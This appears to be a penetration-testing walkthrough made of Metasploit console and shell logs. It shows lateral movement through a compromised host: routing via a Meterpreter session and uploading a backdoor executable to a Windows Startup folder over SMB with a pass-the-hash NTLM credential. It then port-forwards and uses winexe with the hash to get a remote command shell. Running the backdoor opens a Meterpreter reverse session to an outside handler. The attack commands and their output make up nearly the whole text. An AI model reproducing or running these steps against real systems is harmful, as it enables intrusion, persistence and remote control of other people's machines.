# add a route to the 10.x network thru session 1
##################################################
msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added
#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info
Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPATH yes The path of the local file to upload
RHOST yes The target address
RPATH yes The name of the remote file relative to the share
RPORT 445 yes Set the SMB service port
SMBSHARE C$ yes The name of a writeable share on the server
Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.
msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed
################################################
#Set up a portforward to talk to hosts via SMB
################################################
meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445
#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################
user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254
C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088
Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup
01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>
[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012